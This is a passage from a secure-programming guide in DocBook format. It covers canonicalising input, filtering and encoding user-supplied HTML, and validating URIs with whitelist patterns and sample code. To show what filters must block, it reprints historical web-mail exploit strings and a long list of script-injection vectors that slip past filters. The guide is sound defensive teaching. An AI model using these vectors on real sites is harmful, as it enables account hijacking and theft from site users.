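with_zwsp = "ad\u200bmin"   # "admin" with a zero-width space inside


def canonical(text):
    """Normalize to NFC and drop zero-width spaces before comparing."""
    return unicodedata.normalize("NFC", text).replace("\u200b", "")


raw_equal = precomposed == decomposed
normalized_equal = canonical(precomposed) == canonical(decomposed)
```
]]>
</programlisting>
The two spellings compare as different until both are passed through
<literal>canonical()</literal>, so comparisons against lists of forbidden
or reserved names are best done on the canonical form.
</para>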

</sect2>

</sect1>

<sect1 id="input-protection-cross-site">
<title>Prevent Cross-site Malicious Content on Input</title>

<para>
Some programs accept data from one untrusted user and pass that data
on to a second user; the second user's application may then process that
data in a way harmful to the second user.
This is a particularly common problem for web applications;
we'll call this problem ``cross-site malicious content.''
In short, you cannot accept input (including any form data)
without checking, filtering, or encoding it.
For more information, see
<xref linkend="cross-site-malicious-content">.
</para>

<para>
Fundamentally, this means that all web application input must be
filtered (so characters that can cause this problem are removed),
encoded (so the characters that can cause this problem are encoded in
a way to prevent the problem), or
validated (to ensure that only ``safe'' data gets through).
Filtering and validation should often be done at the input, but
encoding can be done either at input or output time.
If you're just passing the data through without analysis, it's probably
better to encode the data on input (so it won't be forgotten), but
if you're processing the data, there are arguments for encoding on
output instead.
</para>

</sect1>


<sect1 id="filter-html">
<title>Filter HTML/URIs That May Be Re-presented</title>

<para>
One special case where cross-site malicious content must be
prevented is web applications
which are designed to accept HTML or XHTML from one user, and then send it on
to other users
(see <xref linkend="cross-site-malicious-content"> for
more information on cross-site malicious content).
The following subsections discuss filtering this specific kind of input,
since handling it is such a common requirement.
</para>

<sect2 id="remove-html-tags">
<title>Remove or Forbid Some HTML Data</title>

<para>
It's safest to remove all possible (X)HTML tags so they cannot affect anything,
and this is relatively easy to do.
As noted above, you should already be identifying the list of legal
characters, and rejecting or removing those characters that aren't
in the list.
In this filter, simply don't include the following characters in
the list of legal characters: ``&lt;'', ``&gt;'', and ``&amp;'' (and if
they're used in attributes, the double-quote character ``&quot;'').
If browsers only operated according to the HTML specifications, the ``&gt;''
wouldn't need to be removed, but in practice it must be removed.
This is because some browsers assume that the author of the page
really meant to put in an opening "&lt;" and ``helpfully'' insert one -
attackers can exploit this behavior and use the "&gt;" to create an
undesired "&lt;".
<!-- CERT http://www.cert.org/tech_tips/malicious_code_mitigation.html -->
</para>

<para>
Usually the character set for transmitting HTML is
ISO-8859-1 (even when sending international text),
so the filter should also omit most control characters (linefeed and
tab are usually okay) and characters with their high-order bit set.
</para>

<para>
One problem with this approach is that it can really surprise users,
especially those entering international text if all international
text is quietly removed.
If the invalid characters are quietly removed without warning,
that data will be irrevocably lost and cannot be reconstructed later.
One alternative is forbidding such characters and sending error messages
back to users who attempt to use them.
This at least warns users, but doesn't give them the functionality
they were looking for.
Other alternatives are encoding this data or validating this data,
which are discussed next.
</para>
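<para>
As a minimal sketch of both options (quiet removal and rejection with an
error), consider the following Python code.
The contents of <literal>LEGAL_CHARS</literal> and the function names are
assumptions chosen for illustration: printable ASCII plus linefeed and
tab, minus the characters discussed above.
<programlisting>
<![CDATA[
```python
import string

# Assumed whitelist: printable ASCII plus linefeed and tab, minus the
# characters that are special in HTML.
LEGAL_CHARS = set(
    string.ascii_letters + string.digits + string.punctuation + " \n\t"
) - set('<>&"')


def remove_illegal(text):
    """Quietly drop anything not on the whitelist (that data is lost)."""
    return "".join(ch for ch in text if ch in LEGAL_CHARS)


def first_illegal(text):
    """Return the first forbidden character, or None, so the caller can
    send an error message instead of silently altering the input."""
    for ch in text:
        if ch not in LEGAL_CHARS:
            return ch
    return None
```
]]>
</programlisting>
Note how <literal>remove_illegal()</literal> silently turns international
text such as an accented word into something else, which is exactly the
surprise described above.
</para>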
</sect2>

<sect2 id="encoding-html-tags">
<title>Encoding HTML Data</title>

<para>
An alternative that is nearly as safe
is to transform the critical characters so they won't
have their usual meaning in HTML.
This can be done by translating all "&lt;" into "&amp;lt;",
"&gt;" into "&amp;gt;", and "&amp;" into "&amp;amp;".
Arbitrary international characters can be encoded in Latin-1
using the format "&amp;#value;" - do not forget the ending semicolon.
Encoding the international characters means you must know what the
input encoding was, of course.
</para>

<para>
One possible danger here is that if these encodings are accidentally
interpreted twice, they will become a vulnerability.
However, this approach at least permits later users to see the
"intent" of the input.
</para>
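<para>
Here is a short Python sketch of this encoding step, using the standard
<literal>html</literal> module.
It assumes the input has already been decoded into a Unicode string (that
is, the input encoding is known); <literal>encode_for_html()</literal> is
a name invented for the example.
<programlisting>
<![CDATA[
```python
import html


def encode_for_html(text):
    """Escape the critical characters, then turn every non-ASCII
    character into a numeric character reference of the form &#value;."""
    escaped = html.escape(text, quote=True)  # handles &, <, > and quotes
    return escaped.encode("ascii", "xmlcharrefreplace").decode("ascii")


once = encode_for_html("<script>")

# The danger of double interpretation: text that was encoded once but
# is decoded twice turns back into live markup.
stored = encode_for_html("&lt;script&gt;")
twice_decoded = html.unescape(html.unescape(stored))
```
]]>
</programlisting>
Decoding <literal>stored</literal> once gives back the harmless text the
user typed; decoding it a second time yields an active tag, so each layer
of a system must encode and decode exactly once.
</para>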
</sect2>

<sect2 id="Validating-html-tags">
<title>Validating HTML Data</title>

<para>
Some applications, to work at all, must accept HTML from third parties
and send them on to their users.
Beware - you are treading dangerous ground at this point; be sure
that you really want to do this.
Even the idea of accepting HTML from arbitrary places
is controversial among some security practitioners, because it is extremely
difficult to get it right.
</para>

<para>
However, if your application must accept HTML, and you believe
that it's worth the risk, at least identify a list
of ``safe'' HTML commands and only permit those commands.
</para>

<para>
Here is a minimal set of safe HTML tags
that might be useful for applications (such as guestbooks)
that support short comments:
&lt;p&gt; (paragraph),
&lt;b&gt; (bold),
&lt;i&gt; (italics),
&lt;em&gt; (emphasis),
&lt;strong&gt; (strong emphasis),
&lt;pre&gt; (preformatted text),
&lt;br&gt; (forced line break - note it doesn't require a closing tag),
as well as all their ending tags.
</para>

<para>
Not only do you need to ensure that only a small set
of ``safe'' HTML commands are accepted, you also need to ensure
that they are properly nested and closed
(i.e., that the HTML commands are ``balanced'').
In XML, this is termed ``well-formed'' data.
A few exceptions could be made if you're accepting standard HTML
(e.g., supporting an implied &lt;/p&gt; where not provided before a
&lt;p&gt; would be fine), but trying to accept HTML in its full
generality (which can infer balancing closing tags in many cases)
is not needed for most applications.
Indeed, if you're trying to stick to XHTML (instead of HTML), then
well-formedness is a requirement.
Also, HTML tags are case-insensitive; tags can be upper case,
lower case, or a mixture.
However, if you intend to accept XHTML
then you need to require all tags to be in lower case
(XML is case-sensitive; XHTML uses XML and requires the tags to be
in lower case).
</para>

<para>
Here are a few random tips about doing this.
Usually you should design whatever surrounds the HTML text and the
set of permitted tags so that the contributed text cannot be misinterpreted
as text from the ``main'' site (to prevent forgeries).
Don't accept any attributes unless you've checked the attribute type and
its value; there are many attributes that support things such as
Javascript that can cause trouble for your users.
You'll notice that in the above list I didn't include any attributes at all,
which is certainly the safest course.
You should probably give a warning message if an unsafe tag is used,
but if that's not practical, encoding the critical characters
(e.g., "&lt;" becomes "&amp;lt;") prevents data loss while
simultaneously keeping the users safe.
</para>
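<para>
The rules above (a short list of safe tags, no attributes, balanced
nesting) can be sketched as a deliberately strict checker in Python.
Everything here is an illustrative assumption rather than a vetted
filter: the function name, the decision to reject an ending tag for
br, the refusal to infer implied ending tags, and the small set of
character entities that are permitted.
<programlisting>
<![CDATA[
```python
import re

SAFE_TAGS = {"p", "b", "i", "em", "strong", "pre", "br"}
VOID_TAGS = {"br"}  # tags that take no ending tag

# A token is a bare tag with no attributes, a run of ordinary text, or
# one of a few entities. Anything else fails to match and is rejected.
TOKEN = re.compile(r"<(/?)([A-Za-z]+)>|[^<>&]+|&(?:amp|lt|gt|quot);")


def is_safe_html(text):
    """True only if text uses safe, attribute-free, balanced tags."""
    stack = []
    pos = 0
    while pos < len(text):
        m = TOKEN.match(text, pos)
        if m is None:
            return False  # stray "<", ">", "&" or a tag with attributes
        pos = m.end()
        if m.group(2) is None:
            continue  # plain text or a permitted entity
        name = m.group(2).lower()  # HTML tag names are case-insensitive
        closing = m.group(1) == "/"
        if name not in SAFE_TAGS:
            return False
        if name in VOID_TAGS:
            if closing:
                return False
            continue
        if closing:
            if not stack or stack.pop() != name:
                return False
        else:
            stack.append(name)
    return not stack  # every opened tag must have been closed
```
]]>
</programlisting>
When <literal>is_safe_html()</literal> returns false, the application can
either report an error or fall back to encoding the critical characters,
as suggested above.
</para>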

<para>
Be careful when expanding this set, and in general be restrictive of
what you accept.
If your patterns are too generous, the browser may interpret the
sequences differently than you expect, resulting in a potential
exploit.
For example, FozZy posted on Bugtraq (1 April 2002)
some sequences that permitted
exploitation in various web-based mail systems,
which may give you an idea of the kinds of problems you need to defend
against.
Here's some exploit text that, at one time, could
subvert user accounts in Microsoft Hotmail:
<programlisting>
<![CDATA[
   <SCRIPT>
   </COMMENT>
   <!-- --> -->
]]>
</programlisting>
Here's some similar exploit text for Yahoo! Mail:
<programlisting>
<![CDATA[
  <_a<script>
  <<script>        (Note: this was found by BugSan)
]]>
</programlisting>
Here's some exploit text for Vizzavi:
<programlisting>
<![CDATA[
  <b onmouseover="...">go here</b>
  <img [line_break] src="javascript:alert(document.location)">
]]>
</programlisting>

Andrew Clover posted to Bugtraq (on May 11, 2002) a list of various
text that invokes Javascript yet manages to bypass many filters.
Here are his examples (which he says he cut and pasted from elsewhere);
some only apply to specific browsers
(IE means Internet Explorer, N4 means Netscape version 4).
<programlisting>
<![CDATA[
  <a href="javas&#99;ript&#35;[code]">
  <div onmouseover="[code]">
  <img src="javascript:[code]">
  <img dynsrc="javascript:[code]"> [IE]
  <input type="image" dynsrc="javascript:[code]"> [IE]
  <bgsound src="javascript:[code]"> [IE]
  &<script>[code]</script>
  &{[code]}; [N4]
  <img src=&{[code]};> [N4]
  <link rel="stylesheet" href="javascript:[code]">
  <iframe src="vbscript:[code]"> [IE]
  <img src="mocha:[code]"> [N4]
  <img src="livescript:[code]"> [N4]
  <a href="about:<s&#99;ript>[code]</script>">
  <meta http-equiv="refresh" content="0;url=javascript:[code]">
  <body onload="[code]">
  <div style="background-image: url(javascript:[code]);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression([code]);"> [IE]
  <style type="text/javascript">[code]</style> [N4]
  <object classid="clsid:..." codebase="javascript:[code]"> [IE]
  <style><!--</style><script>[code]//--></script>
  <!-- -- --><script>[code]</script><!-- -- -->
  <<script>[code]</script>
  <img src="blah"onmouseover="[code]">
  <img src="blah>" onmouseover="[code]">
  <xml src="javascript:[code]">
  <xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml>
    <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[code][\xC0][\xBC]/script> [UTF-8; IE, Opera]
  <![CDATA[<!--]] ><script>[code]//--></script>

]]>
<!-- I inserted a space after ]] just above. -->
</programlisting>
This is not a complete list, of course, but it at least is a sample
of the kinds of attacks that you must prevent by strictly limiting the
tags and attributes you can allow from untrusted users.
</para>
<para>
Konstantin Riabitsev has posted
<ulink url="http://www.mricon.com/html/phpfilter.html">
some PHP code to filter HTML</ulink> (GPL);
I've not examined it closely, but you might want to take a look.
</para>
</sect2>

<sect2 id="Validating-uris">
<title>Validating Hypertext Links (URIs/URLs)</title>

<para>
Careful readers will notice that I did not include the hypertext link tag
&lt;a&gt; as a safe tag in HTML.
Clearly, you could add
&lt;a href="safe URI"&gt; (hypertext link) to the safe list
(not permitting any other attributes unless you've checked their
contents).
If your application requires it, then do so.
However, permitting third parties to create links
is much less safe, because defining a ``safe URI''<footnote>
<para>
Technically, a hypertext link can be any ``uniform resource
identifier'' (URI).
The term "Uniform Resource Locator" (URL) refers to the subset of URIs
that identify resources via a representation of their primary access
mechanism (e.g., their network "location"), rather than identifying
the resource by name or by some other attribute(s) of that resource.
Many people use the term ``URL'' as synonymous with ``URI'', since URLs
are the most common kind of URI.
For example, the encoding used in URIs is actually called ``URL encoding''.
</para>
</footnote>
turns out to be very difficult.
Many browsers accept
all sorts of URIs which may be dangerous to the user.
This section discusses how to validate URIs from third parties for
re-presenting to others, including URIs incorporated into HTML.
</para>

<para>
First, let's look briefly at URI syntax (as defined by various specifications).
URIs can be either ``absolute'' or ``relative''.
The syntax of an absolute URI looks like this:
<programlisting>
scheme://authority[path][?query][#fragment]
</programlisting>
A URI starts with a scheme name (such as ``http''), the characters ``://'',
the authority (such as ``www.dwheeler.com''), a path
(which looks like a directory or file name), a question mark followed by
a query, and a hash (``#'') followed by a fragment identifier.
The square brackets surround optional portions - e.g., many URIs don't
actually include the query or fragment.
Some schemes may not permit some of the data (e.g., paths, queries, or
fragments), and many schemes have additional requirements unique to them.
Many schemes permit the ``authority'' field to identify
optional usernames, passwords, and ports, using this syntax for the
``authority'' section:
<programlisting>
 [username[:password]@]host[:portnumber]
</programlisting>
The ``host'' can either be a name (``www.dwheeler.com'') or an IPv4
numeric address (127.0.0.1).
A ``relative'' URI references one object relative to the ``current'' one,
and its syntax looks a lot like a filename:
<programlisting>
path[?query][#fragment]
</programlisting>
There are a limited number of characters permitted in most of the URI,
so to get around this problem, other 8-bit characters may be ``URL encoded''
as %hh (where hh is the hexadecimal value of the 8-bit character).
For more detailed information on valid URIs, see IETF RFC 2396 and its
related specifications.
</para>
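<para>
To see these pieces in practice, the following Python sketch splits a
URI with the standard <literal>urllib.parse</literal> module.
The URI itself (user name, password, host, and so on) is made up purely
for illustration.
<programlisting>
<![CDATA[
```python
from urllib.parse import urlsplit, unquote

# Hypothetical URI used purely for illustration.
parts = urlsplit("http://alice:secret@www.example.com:8080/docs/a%20b?id=7#top")

scheme = parts.scheme        # the part before "://"
authority = parts.netloc     # [username[:password]@]host[:portnumber]
username = parts.username
password = parts.password
host = parts.hostname
port = parts.port
path = parts.path
query = parts.query          # the text after "?"
fragment = parts.fragment    # the text after "#"

# URL escapes (%hh) are left in place by urlsplit(); unquote() decodes them.
decoded_path = unquote(path)
```
]]>
</programlisting>
Splitting a URI this way before checking it lets each component be
validated against its own rules instead of treating the whole URI as one
opaque string.
</para>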

<para>
Now that we've looked at the syntax of URIs, let's examine the risks
of each part:
<itemizedlist>
<listitem><para>Scheme:
Many schemes are downright dangerous.
Permitting someone to insert a ``javascript'' scheme into your material
would allow them to trivially mount denial-of-service attacks
(e.g., by repeatedly creating windows so the user's machine freezes or
becomes unusable).
More seriously, they might be able to exploit a known vulnerability in
the javascript implementation.
Some schemes can be a nuisance, such as ``mailto:'' when a mailing
is not expected, and some schemes may not be sufficiently secure
on the client machine.
Thus, it's necessary to limit the set of allowed schemes to
just a few safe schemes.
</para></listitem>
<listitem><para>Authority:
Ideally, you should limit user links to ``safe'' sites, but this is
difficult to do in practice.
However, you can certainly do something about usernames, passwords,
and port numbers: you should forbid them.
Systems expecting usernames (especially with passwords!) are probably
guarding more important material;
rarely is this needed in publicly-posted URIs, and someone could try
to use this functionality to convince users
to expose information they have access to and/or
use it to modify the information.
Such URIs permit semantic attacks; see
<xref linkend="semantic-attacks">
for more information.
Usernames without passwords are no less dangerous, since browsers typically
cache the passwords.
You should not usually permit specification of ports, because
different ports expect different protocols and the resulting
``protocol confusion'' can produce an exploit.
For example, on some systems it's possible to use the ``gopher'' scheme
and specify the SMTP (email) port to cause a user to send email of the
attacker's choosing.
You might permit a few special cases (e.g., http ports 8008 and 8080),
but on the whole it's not worth it.
The host when specified by name actually has a fairly limited character set
(using the DNS standards).
Technically, the standard doesn't permit the underscore (``_'') character,
but Microsoft ignored this part of the standard and even requires the
use of the underscore in some circumstances, so you probably should allow it.
Also, there's been a great deal of work on supporting international
characters in DNS names, which is not further discussed here.
</para></listitem>
<listitem><para>Path:
Permitting a path is usually okay, but unfortunately some applications
use part of the path as query data, creating an opening we'll discuss next.
Also, paths are allowed to contain phrases like ``..'', which can expose
private data in a poorly-written web server;
this is less a problem than it once was and really should be fixed
by the web server.
Since it's only the phrase ``..'' that's special, it's reasonable to
look at paths (and possibly query data) and forbid any occurrence of ``../''.
However, if your validator permits URL escapes, this can be difficult;
now you need to prevent versions where some of these characters are
escaped, and may also have to deal with various ``illegal'' character
encodings of these characters as well.
</para></listitem>
<listitem><para>Query:
Query formats (beginning with "?") can be a security risk
because some query formats actually cause actions to occur on the serving end.
They shouldn't, and your applications shouldn't either; see
<xref linkend="avoid-get-non-queries"> for more information.
However, we have to acknowledge the reality as a serious problem.
In addition, many web sites are actually ``redirectors'' - they take a
parameter specifying where the user should be redirected, and send back
a command redirecting the user to the new location.
If an attacker references such sites and provides
a more dangerous URI as the redirection value, and the
browser blithely obeys the redirection, this could be a problem.
Again, the user's browser should be more careful, but not all user
browsers are sufficiently cautious.
Also, many web applications have vulnerabilities that can be
exploited with certain query values, but in general this is hard to
prevent.
The official URI specifications don't sanction the ``+'' (plus) character,
but in practice the ``+'' character often represents the space character.
</para></listitem>
<listitem><para>Fragment:
Fragments basically locate a portion of a document; I'm unaware of
an attack based on fragments as long as the syntax is legal, but the
legality of its syntax does need checking.
Otherwise, an attacker might be able to insert a character such as the
double-quote (") and prematurely end the URI (foiling any checking).
</para></listitem>
<listitem><para>URL escapes:
URL escapes are useful because they can represent arbitrary 8-bit
characters; they can also be very dangerous for the same reasons.
In particular, URL escapes can represent control characters, which many
poorly-written web applications are vulnerable to.
In fact, with or without URL escapes, many web applications are vulnerable
to certain characters (such as backslash, ampersand, etc.), but again
this is difficult to generalize.
</para></listitem>
<listitem><para>Relative URIs:
Relative URIs should be reasonably safe (if you manage the web site well),
although in some applications there's no good reason to allow them either.
</para></listitem>
</itemizedlist>
Of course, there is a trade-off with simplicity as well.
Simple patterns are easier to understand, but
they aren't very refined (so they tend to be too permissive or
too restrictive, even more than a refined pattern).
Complex patterns can be more exact, but they are more likely to have
errors, require more performance to use, and can be hard to
implement in some circumstances.
</para>
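<para>
Some of the per-component checks discussed above can be sketched as
follows in Python.
This is only an illustration under stated assumptions: the function name
<literal>uri_problems()</literal>, the labels it returns, and the set of
allowed schemes are all invented here, and the sketch covers only the
scheme, user name and password, port, and ``..'' checks.
<programlisting>
<![CDATA[
```python
from urllib.parse import urlsplit, unquote

ALLOWED_SCHEMES = {"http", "https", "ftp"}  # assumed short list


def uri_problems(uri):
    """Return a list of labels naming the risky parts found in uri."""
    try:
        parts = urlsplit(uri)
        port = parts.port  # raises ValueError for a malformed port
    except ValueError:
        return ["unparseable"]
    problems = []
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        problems.append("scheme")
    if parts.username is not None or parts.password is not None:
        problems.append("userinfo")
    if port is not None:
        problems.append("port")
    # Decode URL escapes first so that "%2e%2e" cannot hide a "..".
    if ".." in unquote(parts.path).split("/"):
        problems.append("dot-dot")
    return problems
```
]]>
</programlisting>
An empty list means only that none of these particular problems was
found; queries, fragments, and odd characters would still need their own
checks.
</para>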


<para>
Here's my suggestion for a ``simple mostly safe'' URI pattern which is
very simple and can be implemented ``by hand'' or through a regular
expression; permit the following pattern:
<programlisting width="79">
(http|ftp|https)://[-A-Za-z0-9._/]+
</programlisting>
</para>

<para>
This pattern doesn't permit many potentially dangerous capabilities
such as queries, fragments, ports, or relative URIs,
and it only permits a few schemes.
It prevents the use of the ``%'' character, which is used in URL escapes
and can be used to specify characters that the server may not be
prepared to handle.
Since it doesn't permit either ``:'' or URL escapes, it doesn't permit
specifying port numbers, and even using it to redirect to a
more dangerous URI would be difficult (due to the lack of the escape character).
It also prevents the use of a number of other characters; again, many
poorly-designed web applications can't handle a number of
``unexpected'' characters.
</para>

<para>
Even this ``mostly safe'' URI permits
a number of questionable URIs, such as
subdirectories (via ``/'') and attempts to move up directories (via ``..'');
illegal queries of this kind should be caught by the server.
It permits some illegal host identifiers (e.g., ``20.20''),
though I know of no case where this would be a security weakness.
Some web applications treat subdirectories as query data (or worse,
as command data); this is hard to prevent in general since finding
``all poorly designed web applications'' is hopeless.
You could prevent the use of all paths, but this would make it
impossible to reference most Internet information.
The pattern also allows references to local server information
(through patterns such as "http:///", "http://localhost/", and
"http://127.0.0.1") and access to servers on an internal network;
here you'll have to depend on the servers correctly interpreting the
resulting HTTP GET request as solely a request for information and not
a request for an action,
as recommended in <xref linkend="avoid-get-non-queries">.
Since query forms aren't permitted by this pattern, in many environments
this should be sufficient.
</para>

<para>
Unfortunately, the ``mostly safe''
pattern also prevents a number of quite legitimate and useful URIs.
For example,
many web sites use the ``?'' character to identify specific documents
(e.g., articles on a news site).
The ``#'' character is useful for identifying specific sections of a document,
and permitting relative URIs can be handy in a discussion.
Various permitted characters and URL escapes aren't included in the
``mostly safe'' pattern.
For example, without permitting URL escapes, it's difficult to access
many non-English pages.
If you truly need such functionality, then you can use less safe patterns,
realizing that you're exposing your users to higher risk while
giving your users greater functionality.
</para>

<para>
One pattern that permits queries, but at
least limits the protocols and ports used is the following,
which I'll call the ``simple somewhat safe pattern'':
<programlisting width="79">
 (http|ftp|https)://[-A-Za-z0-9._]+(\/([A-Za-z0-9\-\_\.\!\~\*\'\(\)\%\?]+))*/?
</programlisting>
This pattern actually isn't very smart, since it permits illegal escapes,
multiple queries, queries in ftp, and so on.
It does have the advantage of being relatively simple.
</para>

<para>
Creating a ``somewhat safe'' pattern that really limits URIs
to legal values is quite difficult.
Here's my current attempt to do so, which I call
the ``sophisticated somewhat safe pattern'', expressed in a form
where whitespace is ignored and comments are introduced with "#":
<!-- Warning!  If you are cutting and pasting this pattern, make sure that
  the "&amp;" is turned back into an ampersand, and that the whitespace
  is removed before use or ignored during use. -->

<programlisting width="79">
 (
 (
  # Handle http, https, and relative URIs:
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
   (\?(                                                              # query:
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
        ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+
        (\&amp;([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+=
         ([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*)
       |
       (([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+  # isindex
       )
   ))?
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )|
 # Handle ftp:
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )
 )
</programlisting>

</para>

<para>
Even the sophisticated pattern shown above doesn't forbid all illegal URIs.
For example, again, "20.20" isn't a legal domain name, but it's allowed
by the pattern; however, to my knowledge
this shouldn't cause any security problems.
The sophisticated pattern forbids URL escapes that represent
control characters (e.g., %00 through %1F) -
the smallest permitted escape value is %20 (ASCII space).
Forbidding control characters prevents some trouble, but it's
also limiting; change "2-9" to "0-9" everywhere if you need to support sending
all control characters to arbitrary web applications.
This pattern does permit all other URL escape values in paths,
which is useful for international characters but could cause trouble
for a few systems which can't handle it.
The pattern at least prevents spaces, linefeeds,
double-quotes, and other dangerous characters
from being in the URI, which prevents other kinds of
attacks when incorporating the URI into a generated document.
Note that the pattern permits ``+'' in many places, since in practice
the plus is often used to replace the space character
in queries and fragments.
</para>
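<para>
The escape rule used throughout the sophisticated pattern,
%[2-9A-Fa-f][0-9a-fA-F], can also be checked by hand.
The following C sketch does only that one job: it verifies that every
``%'' starts a well-formed escape whose value is %20 or higher.
The function name url_escapes_are_safe() is hypothetical, and the
function deliberately says nothing about the other characters in the
string, which still need to be checked separately.
<programlisting>
<![CDATA[
#include <string.h>

/* Return 1 if every '%' in s begins an escape of the form
   %[2-9A-Fa-f][0-9A-Fa-f] (that is, %20 or above), else 0. */
int url_escapes_are_safe(const char *s)
{
    static const char first_ok[]  = "23456789ABCDEFabcdef";
    static const char second_ok[] = "0123456789ABCDEFabcdef";

    if (s == NULL) return 0;
    for (; *s != '\0'; s++) {
        if (*s != '%') continue;
        /* strchr() also matches the terminator, so test for it first. */
        if (s[1] == '\0' || strchr(first_ok, s[1]) == NULL) return 0;
        if (s[2] == '\0' || strchr(second_ok, s[2]) == NULL) return 0;
        s += 2;  /* skip the two hex digits just checked */
    }
    return 1;
}
]]>
</programlisting>
</para>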

<para>
Unfortunately, as noted above,
there are attacks which can work through any technique that permits query data,
and there don't seem to be really good defenses for them once you
permit queries.
So, you could strip out the ability to use query data from the
pattern above, but permit the other forms, producing a
``sophisticated mostly safe'' pattern:
<programlisting width="79">
 (
 (
  # Handle http, https, and relative URIs:
  ((https?://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?))|
    ([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)?
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
   (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )|
 # Handle ftp:
 (ftp://([A-Za-z0-9][A-Za-z0-9\-]*(\.[A-Za-z0-9][A-Za-z0-9\-]*)*\.?)
  ((/([A-Za-z0-9\-\_\.\!\~\*\'\(\)]|(%[2-9A-Fa-f][0-9a-fA-F]))+)*/?) # path
  (\#([A-Za-z0-9\-\_\.\!\~\*\'\(\)\+]|(%[2-9A-Fa-f][0-9a-fA-F]))+)? # fragment
  )
 )
</programlisting>
</para>

<para>
As far as I can tell, as long as these patterns are only used to check
hypertext anchors selected by the user (the "&lt;a&gt;" tag)
this approach also prevents the insertion of ``web bugs''.
Web bugs are simply text that allows someone other
than the originating web server
of the main page to track information such as who read
the content and when they read it -
see <xref linkend="embedded-content-bugs"> for more information.
This isn't true if you use the &lt;img&gt; (image) tag with the same
checking rules - the image tag is loaded immediately, permitting
someone to add a ``web bug''.
Once again, this presumes that you're not permitting any attributes;
many attributes can be quite dangerous and pierce the security you're
trying to provide.
</para>

<para>
Please note that all of these patterns require that the entire URI match
the pattern.
An unfortunate fact of these patterns is that they limit the
allowable patterns in a way that forbids many useful ones
(e.g., they prevent the use of new URI schemes).
Also, none of them can prevent the very real problem that some web sites
perform more than queries when presented with a query - and some of these
web sites are internal to an organization.
As a result, no URI can really be safe until there
are no web sites that accept GET queries as an action
(see <xref linkend="avoid-get-non-queries">).
For more information about legal URLs/URIs, see IETF RFC 2396;
domain name syntax is further discussed in IETF RFC 1034.
</para>
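<para>
One way to enforce the ``entire URI must match'' requirement with the
POSIX regcomp(3) and regexec(3) functions is to anchor the pattern with
``^'' and ``$''.
The sketch below does this for the ``simple mostly safe'' pattern;
the function name uri_matches_entirely() is made up for the example.
It assumes the program runs in the default "C" locale, so that ranges
such as A-Z mean what they appear to mean.
Note that the longer patterns in this section use backslashes inside
brackets, and POSIX bracket expressions treat a backslash as an ordinary
character, so those patterns would need adapting before being used this way.
<programlisting>
<![CDATA[
#include <regex.h>
#include <stddef.h>

/* Return 1 if the WHOLE string matches the pattern, 0 if it does not,
   and -1 if the pattern fails to compile. */
int uri_matches_entirely(const char *uri)
{
    /* The ^ and $ anchors force the entire string to match. */
    static const char pattern[] = "^(http|ftp|https)://[-A-Za-z0-9._/]+$";
    regex_t re;
    int rc;

    if (uri == NULL) return 0;
    if (regcomp(&re, pattern, REG_EXTENDED | REG_NOSUB) != 0) return -1;
    rc = regexec(&re, uri, 0, NULL, 0);
    regfree(&re);
    return rc == 0 ? 1 : 0;
}
]]>
</programlisting>
A program that checks many URIs would normally compile the pattern once
and reuse it; it is recompiled on every call here only to keep the
example short.
</para>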
</sect2>

<sect2 id="other-html-tags">
<title>Other HTML tags</title>

<para>
You might even consider supporting more HTML tags.
Obvious next choices are the list-oriented tags, such as
&lt;ol&gt; (ordered list),
&lt;ul&gt; (unordered list),
and &lt;li&gt; (list item).
However, after a certain point you're really permitting
full publishing (in which case you need to trust the provider or perform more
serious checking than will be described here).
Even more importantly, every new functionality you add creates an
opportunity for error (and exploit).
</para>

<para>
One example would be permitting the
&lt;img&gt; (image) tag with the same URI pattern.
It turns out this is substantially less safe, because this
permits third parties to insert ``web bugs'' into the document,
identifying who read the document and when.
See <xref linkend="embedded-content-bugs"> for more information on web bugs.
</para>
</sect2>

<sect2 id="related-issues">
<title>Related Issues</title>

<para>
Web applications should also explicitly specify the character set
(usually ISO-8859-1), and not permit other characters, if data from
untrusted users is being used.
See <xref linkend="output-character-encoding"> for more information.
</para>

<para>
Since filtering this kind of input is easy to get wrong, other
alternatives have been discussed as well.
One option is to ask users to use a different language, much simpler
than HTML, that you've designed - and you give that language very limited
functionality.
Another approach is parsing the HTML into some internal ``safe'' format,
and then translating that safe format back to HTML.
</para>

<para>
Filtering can be done during input, output, or both.
The CERT recommends filtering data during the output process,
just before it is rendered as part of the dynamic page.
This is because, if it is done correctly,
this approach ensures that all dynamic content is filtered.
The CERT believes that filtering on the input side is less effective
because dynamic content can be entered into a web site's database(s) via
